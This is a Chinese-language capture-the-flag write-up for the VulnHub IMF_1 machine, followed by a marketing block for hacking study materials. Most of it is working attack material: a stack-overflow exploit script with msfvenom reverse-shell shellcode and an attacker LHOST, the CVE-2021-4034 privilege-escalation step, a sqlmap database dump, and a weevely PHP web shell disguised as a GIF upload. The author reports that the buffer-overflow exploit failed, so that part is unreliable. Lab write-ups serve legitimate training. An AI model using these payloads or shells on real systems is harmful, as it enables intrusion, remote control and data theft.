IMF_1(VulbHub)_WriteUp(2)，2024网络安全笔试题总结

netstat -ant —查看开启的端口情况
nc 127.0.0.1 7788 —查看到开启7788端口是anget程序的

查看/usr/local/bin下的文件

敲震端口

敲震端口：
knock 192.168.126.167 7482 8279 9467
nmap 192.168.126.167 -p7788,80 ----这时候7788端口开启

通过追踪来继续研究agent文件

ltrace ./agent
随意输入数字！
strncmp(“dwqdq\n”, “48093572”, 8) = -1 ----正在将我提供的字符串与字符串48093572进行比较，在这种情况下导致=-1）

为了防止缓冲区溢出这种情况的出现，在C库函数中，许多对字符串操作的函数都有其"n兄弟"版本，例如strncmp，strncat，snprintf……兄弟版本的基本行为不变，但是通常在参数中需要多给出一个整数n，用于限制操作的最大字符数量。

甚至strings agent发现：两个地方使用了“%s”，这很可能是一个有效的溢出点！

vmmap
0xfffdc000 0xffffe000 rwxp [stack]
发现这是个栈溢出的题目！

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000
gdb ./agent
run
48093572
输入后：
Main Menu:

1. Extraction Points
2. Request Extraction
3. Submit Report
4. Exit
   选择Submit Report 3：

输入2000值后，发现segmentation fault溢出报错！存在缓冲区溢出！
0x41366641

还发现：堆栈开始是EAX寄存器
EAX: 0xffffcfd4 (“AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASA\324\317\377\377TAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA”…)

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41366641
发现偏移量为：168

python -c ‘print “A” * 168 + “B” * 4’
通过测试：
EAX: 0xffffcfd4 (‘A’ <repeats 152 times>, “\324\317\377\377”, ‘A’ <repeats 15 times>, “BBBB”)
EIP被168个字节覆盖，但是多给的B字节走到了EAX上，在给多个C测试shellcode会走哪儿！

python -c ‘print “A” * 168 + “B” * 4 + “CCCCCCCCCCCCCCCC”’
EAX: 0xffffcfd4 (‘A’ <repeats 152 times>, “\324\317\377\377”, ‘A’ <repeats 12 times>, “BBBB”, ‘C’ <repeats 16 times>)

或者：
info registers eax
x/20x $eax -32
这时候可看到：
0xffffcfc4: 0xffffcfd4 0x00000001 0x00000000 0x0804b02c
0xffffcfd4: 0x41414141 0x41414141 0x41414141 0x41414141
…

C也走到了EAX，找保护措施！那么只需要找到eax值，即可直接跳到shellcode！

checksec
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : disabled
PIE : disabled
RELRO : Partial
RELRO 是一种用于加强对 binary 数据段的保护的技术。
参考：https://lantern.cool/note-pwn-linux-protect/

查看ASLR设置：
cat /proc/sys/kernel/randomize_va_space
2
或者：
sysctl -a --pattern randomize
kernel.randomize_va_space = 2

0 = 关闭
1 = 半随机。共享库、栈、mmap() 以及 VDSO 将被随机化。（留坑，PIE会影响heap的随机化。。）
2 = 全随机。除了1中所述，还有heap。
说明存在随机化！ASLR功能的程序使用ret2reg（返回寄存器）指令来利用缓冲区溢出
参考大佬：
https://www.securitylab.ru/analytics/405868.php

gdb-peda$ jmpcall eax
0x8048563 : call eax

或者：asmsearch “jmp eax”
asmsearch “call eax”

EAX 地址0x8048563

目前知道了JMP值：0x8048563
偏移量：168
接下来创建shellcode写个脚本就直接拿下！

创建后门

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.126.134 LPORT=6666 -f python -b “\x00\x0a\x0b”

payload：
-p 载荷类型
LHOST 本机地址
LPORT
-b 坏字符
-f 编译的语言
\x00 == 0x00 ASCII控制字符表中对应 NULL (空字符)
\x0a == 0X0a ASCII控制字符表中对应 LF （换行键）
\x0b == 0x0b ASCII控制字符表中对应 VT (垂直定位符号)

需要运行，在输入密码，在输入ID，才能进行缓冲区溢出，这时候需要expect的特殊脚本语言来写：
https://en.wikipedia.org/wiki/Expect

最终代码：exp.py

参考大余老师的：

import socket

Target related variables

remotehost = “10.211.55.36”
remoteport = 7788
menuoption = 3
agentid = 48093572

Default recv size

recvsize = 512

Connnect to remote host

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((remotehost, remoteport))
client.recv(recvsize)
client.send(“{0}\n”.format(agentid))
client.recv(recvsize)
client.send(“{0}\n”.format(menuoption))
client.recv(recvsize)

Payload genereated by Msfvenom, to be force fed into reporting tool

buf = b""
buf += b"\xdb\xda\xd9\x74\x24\xf4\xbb\x99\x95\x96\x1f\x58\x33"
buf += b"\xc9\xb1\x12\x31\x58\x17\x83\xe8\xfc\x03\xc1\x86\x74"
buf += b"\xea\xc0\x73\x8f\xf6\x71\xc7\x23\x93\x77\x4e\x22\xd3"
buf += b"\x11\x9d\x25\x87\x84\xad\x19\x65\xb6\x87\x1c\x8c\xde"
buf += b"\x1d\x0c\x59\x0d\x4a\xb0\xa6\x2b\x80\x3d\x47\xfb\xf2"
buf += b"\x6d\xd9\xa8\x49\x8e\x50\xaf\x63\x11\x30\x47\x12\x3d"
buf += b"\xc6\xff\x82\x6e\x07\x9d\x3b\xf8\xb4\x33\xef\x73\xdb"
buf += b"\x03\x04\x49\x9c"

Buffer is too small to trigger overflow. Fattening it up!

168 is the offset I found using pattern_offset

buf += “A” * (168 - len(buf))

EAX call I made note of earlier in this segment

buf += “\x63\x85\x04\x08\n”

And off we go!

client.send(buf)

测试效果

有点失败，没戏。提权试试。

cve-2021-4034-poc.c_2022通杀提权

法二：cve-2021-4034-poc.c提权

基础探测

脚本探测

这里只能找到这个，但是不是我们想要的

上google搜索该版本提权漏洞，发现2022年有一个超级提权漏洞，其他漏洞也是可以的，不过这个最快。

CVE-2021-4034

使用cve-2021-4034-poc.c

发现flag6

拓展

sqlmap可以一步到位

sqlmap -r sql_post.txt --batch --dump

上传gif，却可以执行php命令

为什么该文件上传允许gif解析php？？
cd /var/www/html/imfadministrator/uploads —进入文件上传目录
ls -la —查看到存在.htaccess
cat查看信息：
AddType application/x-httpd-php .php .gif
AddHandler application/x-httpd-php .gif
可看到该文件与继续gif解析php文件！

weevely

weevely generate passdayu dayu.php —生成dayu.php文件密码为passdayu
generate —生成新代理
mv dayu.php dayu.gif —然后头部加入GIF98a并改名文件为gif

然后上传文件，看源码ID：ff075cd8aeef
weevely http://10.211.55.36/imfadministrator/uploads/ff075cd8aeef.gif passdayu
成功获得shell，该shell很稳定！

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供：

因篇幅有限，仅展示部分资料

网络安全面试题

绿盟护网行动

还有大家最喜欢的黑客技术

网络安全源码合集+工具包

所有资料共282G，朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》，可以扫描下方二维码领取（如遇扫码问题，可以在评论区留言领取哦）~

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

所有资料共282G，朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》，可以扫描下方二维码领取（如遇扫码问题，可以在评论区留言领取哦）~

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
[外链图片转存中…(img-IdIRYq28-1712496723205)]